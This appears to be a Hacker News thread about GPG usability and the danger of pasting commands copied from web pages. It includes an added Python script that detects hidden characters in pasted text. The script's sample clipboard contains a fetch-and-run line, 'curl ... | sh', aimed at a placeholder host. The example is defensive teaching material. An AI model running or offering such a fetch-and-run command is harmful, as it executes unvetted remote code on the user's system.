
Are you really confident that cutting and pasting crap from a random web page (particularly one without TLS, so the guy sitting across from you at Starbucks can MITM it) provides you with sufficient understanding to notice when you are accidentally doing something insecure?



I cross-referenced it against the documentation. Let's assume someone won't, though. The commands' appearance makes their intent pretty obvious. Further, using them produces output that confirms what the cheat sheet says. For instance, adding a public key said something along the lines of "public key added." Decrypting the incoming message showed its plaintext. Encrypting outgoing plaintext turned it into ciphertext the other party decrypted. Along with a warning that the key didn't have others' signatures on it, which ironically reassured me more because it shouldn't.

So, a visual inspection of the commands and their results in a sandboxed machine was about all one needed to know that they worked. My experience with similar tools helps there. More concerned people can thoroughly cross-reference them with the documentation, source code, program's author, and so on. Whatever level of assurance they like. The basic level, though, was incredibly simple.

I'd take using GPG over learning Emacs or OpenBSD any day. In level of difficulty, that is.


The problem with copying and pasting from a website is not whether you think you know what the command does. It is that copying from an HTML page might contain stuff you can see.

https://thejh.net/misc/website-terminal-copy-paste
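The trick behind that link is that a browser selection includes text the page hides with CSS, so the clipboard can carry extra lines, and an interactive shell runs a pasted line the moment it sees a newline. The following Python check is an added example, not the commenter's code and not the linked demo: it inspects a string the way you would want to inspect a paste before it reaches a terminal, flagging line terminators, zero-width and other invisible characters, and ANSI escapes, and shows which commands a shell would actually execute. The clipboard contents are constructed for illustration; the hostnames are placeholders.

```python
"""Inspect text before pasting it into a shell (added example, not from the page)."""
import re
import unicodedata

# Constructed sample: what the clipboard might hold after copying a single
# visible "git clone" line from a page that hides a second command in an
# invisible element. The domains are placeholders, not real hosts.
SAMPLE_CLIPBOARD = (
    "git clone https://example.invalid/repo.git\n"
    "curl -s https://example.invalid/x | sh\n"
    "\u200b# only this line was visible\r"
)

# CSI escape sequences (e.g. colour codes, cursor movement) that a terminal
# would interpret rather than display.
ANSI_ESCAPE = re.compile(r"\x1b\[[0-?]*[ -/]*[@-~]")

# Code points that render as nothing but survive copy/paste.
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}


def find_hidden(text):
    """Return sorted (offset, description) pairs for characters that are not
    visible on a web page but change what a shell does with the paste.
    A trailing newline is reported too: it makes the shell run the
    command before you can read it."""
    findings = []
    covered = set()
    for m in ANSI_ESCAPE.finditer(text):
        findings.append((m.start(), "ANSI escape sequence"))
        covered.update(range(m.start(), m.end()))
    for i, ch in enumerate(text):
        if i in covered:
            continue
        if ch in ("\n", "\r"):
            # Both LF and CR submit the current line in readline.
            findings.append((i, "line terminator (shell would execute here)"))
        elif ch in ZERO_WIDTH:
            findings.append((i, "zero-width character U+%04X" % ord(ch)))
        elif unicodedata.category(ch) in ("Cc", "Cf") and ch != "\t":
            findings.append((i, "control/format character U+%04X" % ord(ch)))
    return sorted(findings)


def commands_shell_would_run(text):
    """Split the paste the way an interactive shell would: every LF or CR
    submits whatever precedes it. Returns the non-empty command lines."""
    return [ln.strip() for ln in re.split(r"[\r\n]", text) if ln.strip()]


def safe_to_paste(text):
    """True only if the text is one line with nothing invisible in it."""
    return not find_hidden(text)


if __name__ == "__main__":
    for offset, what in find_hidden(SAMPLE_CLIPBOARD):
        print("offset %3d: %s" % (offset, what))
    print("commands the shell would run:")
    for cmd in commands_shell_would_run(SAMPLE_CLIPBOARD):
        print("  " + repr(cmd))
    print("safe to paste:", safe_to_paste(SAMPLE_CLIPBOARD))
```

The cheap version of the same check, with no script at all, is to paste into `cat -A` (or a text editor) first and look for `$` line ends and `^[` escapes before pasting into a shell prompt; the script only makes the inspection explicit and repeatable.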


Damn! That was a surprise! Alright, point taken. I'll... have to validate things on terminals a lot more thoroughly in the future. And type my own code by hand based on the documentation. Maybe just make my own cheat-sheets for the cut and paste. Text files.


s/can/can't


Agree with regard to Emacs, but OpenBSD has some of the best technical documentation I've ever come across. For example, their networking FAQ[0] or (especially) the PF guide[1].

[0] http://www.openbsd.org/faq/faq6.html

[1] http://www.openbsd.org/faq/pf/


Their documentation is great. I won't disagree in the slightest. I also praised them in other places for working as hard on docs as software itself. Docs are lacking in most places. The only point of these comments is that people are way overhyping the difficulty of basic GPG use given I installed it easily using Google and used it by cut n pasting a cheat sheet. Others have too. That's all I'm trying to do here while using things like the overall OpenBSD experience (or Emacs) as points of comparison to support that.

I'd have to use my brain with either OpenBSD stuff or Emacs. Of course, I cheated there too: Absolute OpenBSD. I know I could've used their great docs for everything but the reviews of the book were too good. I had to attempt using it to shortcut the learning process. Lol.


[flagged]


There's a good reason for that, actually. Besides, it doesn't matter how long ago I went to key-signing parties and such. The number of people I know using PGP I can count on one hand, maybe two. I have reliable channels to them to get keys. Web of trust is useless to me and despite my poor memory I can remember debating people about its many weaknesses even back when we did it a lot.

Modern tech has moved on to more interesting and reliable reputation systems. Web of trust's time has passed, for now.


I meant the whole thing - subkeys, their very purpose (even CAs use subkeys to sign certificates!) or usage, etc.

Seems a bit strange for a security researcher - that's all.


Lost much of my memory in an accident where I took severe head injury. What my brain kept it kept. What it didn't it didn't. Most stuff I hadn't used in forever went poof. Web of trust model was one of those. Some things I'd just have to straight up relearn and I'm not bothering unless I have a need given only so much memory to spare.

Hope that makes sense.


> you haven't the slightest clue

No personal swipes, please.


How is this personal?

I'm not trying to insult anyone, it's a mere statement of a fact - the OP hasn't the slightest clue about web of trust, subkeys, key-signing, etc. and he clearly demonstrated it in several comments. In those he spreads misinformation and FUD - and those are signs of a troll. So if I say "you haven't the slightest clue" to such an individual, I'm being polite.

Good day.



